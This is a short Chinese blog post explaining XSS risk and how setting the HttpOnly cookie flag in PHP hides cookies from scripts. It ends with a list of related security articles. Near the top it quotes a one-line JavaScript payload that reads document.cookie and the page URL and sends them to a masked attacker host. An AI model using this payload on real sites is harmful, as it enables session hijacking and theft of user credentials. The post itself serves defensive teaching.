xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的站点出现xss漏洞,就能够运行随意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,假设这里面包括了大量敏感信息(身份信息,管理员信息)等,那完了。。。

例如以下js获取cookie信息:

     url=document.top.location.href;cookie=document.cookie;c=new Image();c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;

一般cookie都是从document对象中获取的,如今浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的參数,跟domain等其它參数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:

  1. //在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
  2. ini_set("session.cookie_httponly", 1);
  3.  
  4. //或者setcookie()的第七个參数设置为true
  5. session_set_cookie_params(0, NULL, NULL, NULL, TRUE);


对于PHP5.1曾经版本号的PHP通过:

  1. header("Set-Cookie: hidden=value; httpOnly");

最后,HttpOnly不是万能的!

利用HttpOnly来防御xss攻击相关推荐

  1. 如何防止通过url攻击_什么是XSS攻击?如何防御XSS攻击?

    大家上午好,大家经常听到XSS攻击这个词,那么XSS攻击到底是什么,以及如何防御大家清楚么?今天,小墨就给大家讲一下:XSS攻击的定义.类型以及防御方法.什么是XSS攻击? XSS攻击全称跨站脚本攻击 ...

  2. 浅谈如何防御xss攻击

    笔前闲聊 最近都在写一些防守型文章,是因为笔者在最近的学习当中发现一些当初以攻击者角度学习的知识在某些特殊的场合下会表现的有点不够全面,总是感觉某些知识点联系不在一起,所以最近总是写一些防御型文章来把 ...

  3. 了解与防御XSS攻击

    一. XSS是什么 XSS攻击全称跨站脚本攻击(Cross Site Scripting),是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写 ...

  4. post攻击 xxs_如何正确防御xss攻击

    展开全部 传统防御技术 2.1.1基于特征的防御 传统XSS防御多采用特征匹配方32313133353236313431303231363533e78988e69d8331333366303830式, ...

  5. php+防御+xss,PHP防御XSS攻击

    XSS即跨站脚本工具 例如我在你的评论上写了 然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下 通过这种方式,你的所有cookie就会被发送到对应的网 ...

  6. 利用html编码进行xss攻击

    脆弱性测试的时候,发现了一处输出没有做编码转换,但由于开启了magic_quote_gpc,导致提交的数据中,' "都被转义,最后导致输出的地方不能执行恶意js. 如下: 提交的恶意数据为 ...

  7. 服务器安全:浏览器同源策略与跨域请求、XSS攻击原理及防御策略、如何防御CSRF攻击

    主要包括 浏览器同源策略与跨域请求 XSS攻击原理及防御策略 如何使用SpringSecurity防御CSRF攻击 CC/DDOS攻击与流量攻击 什么是SSL TLS HTTPS? 一.浏览器的同源策 ...

  8. 解决SQL注入与XSS攻击

    最近接手之前同事的几个项目,公司利用扫描工具进行全项目扫描,发现了部分项目代码存在安全漏洞,所以需要进行项目代码修复以避免有人恶意攻击.这个任务自然而然的就落到我手上.在这里记录一下操作的过程. 扫描 ...

  9. 面试问题如何预防xss攻击

    1. XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩 ...

  10. 前端Hack之XSS攻击个人学习笔记

    简单概述 **        此篇系本人两周来学习XSS的一份个人总结,实质上应该是一份笔记,方便自己日后重新回来复习,文中涉及到的文章我都会在末尾尽可能地添加上,此次总结是我在学习过程中所写,如有任 ...

最新文章

  1. 涉及位操作的算法辑录
  2. 内核打上yaffs2补丁遇到的问题
  3. ubuntu解压zip文件乱码问题
  4. 如何在Python中建立和训练K最近邻和K-Means集群ML模型
  5. 【ClickHouse 技术系列】- 在 ClickHouse 中处理实时更新
  6. php多个表中查找数据_HeidiSQL 免费的可视化数据库管理工具
  7. Ubuntu18.04安装cuDNN和Tensorflow的正确姿势
  8. 【idea】idea快捷键(更新中....)
  9. 【GNN】百度「NLP」面试的一点总结
  10. Node.js学习入门
  11. apulSoft apShaper for Mac(滤波失真插件)
  12. aria2,破解限速的傻瓜式教程
  13. 微信UnionId 部分开放
  14. 百度网盘资源转迅雷下载正确打开方式!(更新日期2018年11月24日,亲测可用)
  15. 如何使用python制作一款屏幕颜色提取器,附带exe文件
  16. Eclipse开发必备干货分享
  17. java 设置打印机颜色_java 操作颜色选择器和打印机实现打印功能【代码片段】...
  18. 仿QQ相册RecyclerView滑动选中
  19. Windows 10 美式键盘消失 解决方案
  20. 离人眼里的百度百态——献给过往

热门文章

  1. 在access中一列称为_ACCESS考试_笔试
  2. java millis_Java Duration.getMillis方法代码示例
  3. linux db2v9.7卸载,db2 卸载和安装
  4. java提供两种处理异常的机制_Java的异常机制分析及处理办法
  5. 爬虫python漏洞群_『Python』 爬取 WooYun 论坛所有漏洞条目的相关信息
  6. JavaScript的预编译过程分析
  7. 第3次作业:阅读《构建之法》1-5章
  8. textarea 的中文输入判断与搜狗输入法的特殊行为
  9. 二元最近的共同祖先问题(O(n) time 而且,只有一次遍历,O(1) Space (它不考虑函数调用栈空间))...
  10. java设计模式_抽象工厂